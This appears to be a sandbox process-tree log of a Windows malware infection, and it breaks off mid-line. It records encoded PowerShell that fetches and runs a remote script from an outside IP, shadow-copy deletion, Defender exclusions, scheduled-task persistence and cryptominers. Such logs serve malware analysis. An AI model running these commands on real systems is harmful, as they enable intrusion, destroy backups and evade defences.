C:\Program Files (x86)\LuckyWheel\WindowsServices.exe
"C:\Program Files (x86)\LuckyWheel\WindowsServices.exe"
3⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\a\KK.exe
"C:\Users\Admin\AppData\Local\Temp\a\KK.exe"
2⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\a\360.exe
"C:\Users\Admin\AppData\Local\Temp\a\360.exe"
2⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\a\word.exe
"C:\Users\Admin\AppData\Local\Temp\a\word.exe"
2⤵
PID:1544

C:\Users\Admin\AppData\Local\Temp\a\portable.exe
"C:\Users\Admin\AppData\Local\Temp\a\portable.exe"
2⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\a\malwr.exe
"C:\Users\Admin\AppData\Local\Temp\a\malwr.exe"
2⤵
PID:2168

C:\Windows\system32\cmd.exe
cmd.exe /C vssadmin.exe delete shadows /all /quiet
3⤵
PID:6692

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:4860

C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe"
2⤵
PID:3044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
3⤵
PID:6564

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:6872

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:4368

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:356

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:7132

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:4956

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:6584

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:7100

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:7072

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:7060

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
3⤵
PID:7048

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:7092

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:7020

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
3⤵
PID:7044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
PID:6984

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:6964

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
3⤵
PID:7012

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:7004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:6972

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:6832

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
PID:6888

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:6884

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
3⤵
PID:6328

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:6788

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:6776

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:6748

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:6820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
3⤵
PID:6556

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
3⤵
PID:6548

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
3⤵
PID:6524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\a\file.exe
"C:\Users\Admin\AppData\Local\Temp\a\file.exe"
2⤵
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:5936

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
PID:7820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:4696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:6040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:6968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:8012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\a\5_6232986114823555269.exe
"C:\Users\Admin\AppData\Local\Temp\a\5_6232986114823555269.exe"
2⤵
PID:6156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\LuckyWheel\kill.bat""
3⤵
PID:6656

C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe
"C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe"
3⤵
PID:2156

C:\Program Files (x86)\LuckyWheel\WindowsServices.exe
"C:\Program Files (x86)\LuckyWheel\WindowsServices.exe"
3⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\a\222.exe
"C:\Users\Admin\AppData\Local\Temp\a\222.exe"
2⤵
PID:6632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
2⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:6456

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
2⤵
PID:6356

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
3⤵
PID:6228

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
3⤵
PID:7196

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
2⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\a\SvCpJuhbT.exe
"C:\Users\Admin\AppData\Local\Temp\a\SvCpJuhbT.exe"
2⤵
PID:7192

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\SysWOW64\notepad.exe"
3⤵
PID:5580

C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
4⤵
PID:4440

C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
4⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\a\EdGen.exe
"C:\Users\Admin\AppData\Local\Temp\a\EdGen.exe"
2⤵
PID:7692

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
2⤵
PID:288

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
3⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\a\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\a\vpn.exe"
2⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
2⤵
PID:284

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
3⤵
PID:8108

C:\Users\Admin\AppData\Local\Temp\a\build(3).exe
"C:\Users\Admin\AppData\Local\Temp\a\build(3).exe"
2⤵
PID:6948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "build(3)" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\build(3).exe" &&START "" "C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe"
3⤵
PID:6896

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:5840

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:9000

C:\Users\Admin\AppData\Local\Temp\a\Nfjyejcuamv.exe
"C:\Users\Admin\AppData\Local\Temp\a\Nfjyejcuamv.exe"
2⤵
PID:8024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
3⤵
PID:6068

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:976

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"
2⤵
PID:280

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3⤵
PID:6756

C:\Program Files (x86)\1683762537_0\360TS_Setup.exe
"C:\Program Files (x86)\1683762537_0\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
4⤵
PID:8804

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
2⤵
PID:4688

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOktOFpaLKGPz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp291B.tmp"
3⤵
- Creates scheduled task(s)
PID:8764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IOktOFpaLKGPz.exe"
3⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
3⤵
PID:8824

C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe"
2⤵
PID:2652

C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe
"C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe" C:\Users\Admin\AppData\Local\Temp\qjvqkpi.odu
3⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe"
2⤵
PID:7952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\a\v123.exe
"C:\Users\Admin\AppData\Local\Temp\a\v123.exe"
2⤵
PID:7808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:3828

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:6376

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:5320

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:7772

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
3⤵
PID:6476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:432

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:7304

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:6008

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
3⤵
PID:5708

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:7128

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:7220

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
PID:7604

C:\Users\Admin\AppData\Local\Temp\a\dan.exe
"C:\Users\Admin\AppData\Local\Temp\a\dan.exe"
2⤵
PID:7880

C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe
"C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe"
2⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe"
2⤵
PID:4224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:7400

C:\Users\Admin\AppData\Local\Temp\a\services.exe
"C:\Users\Admin\AppData\Local\Temp\a\services.exe"
2⤵
PID:2352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
3⤵
PID:8112

C:\Users\Admin\AppData\Local\Temp\a\install.exe
"C:\Users\Admin\AppData\Local\Temp\a\install.exe"
2⤵
PID:3248

C:\Users\Admin\AppData\Local\Temp\a\install.exe
C:\Users\Admin\AppData\Local\Temp\a\install.exe
3⤵
PID:6376

C:\Users\Admin\AppData\Local\Temp\a\install.exe
C:\Users\Admin\AppData\Local\Temp\a\install.exe
3⤵
PID:8488

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe"
2⤵
PID:7028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
3⤵
PID:8368

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Scnolxsyquote .pdf"
3⤵
PID:5452

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:7184

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1357005408AE023E1C516F3DE0F97590 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1357005408AE023E1C516F3DE0F97590 --renderer-client-id=2 --mojo-platform-channel-handle=1532 --allow-no-sandbox-job /prefetch:1
5⤵
PID:7672

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A93B2E201436ED9E255C80088027FA36 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:7996

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CAD4E37C9C9CD10AB7C75CA036C7405D --mojo-platform-channel-handle=2192 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:8412

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7EE762433B5C1D8DDA1F058F682896D0 --mojo-platform-channel-handle=2368 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:7564

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8A3F17671C88CC150419FAFC8500DACB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context 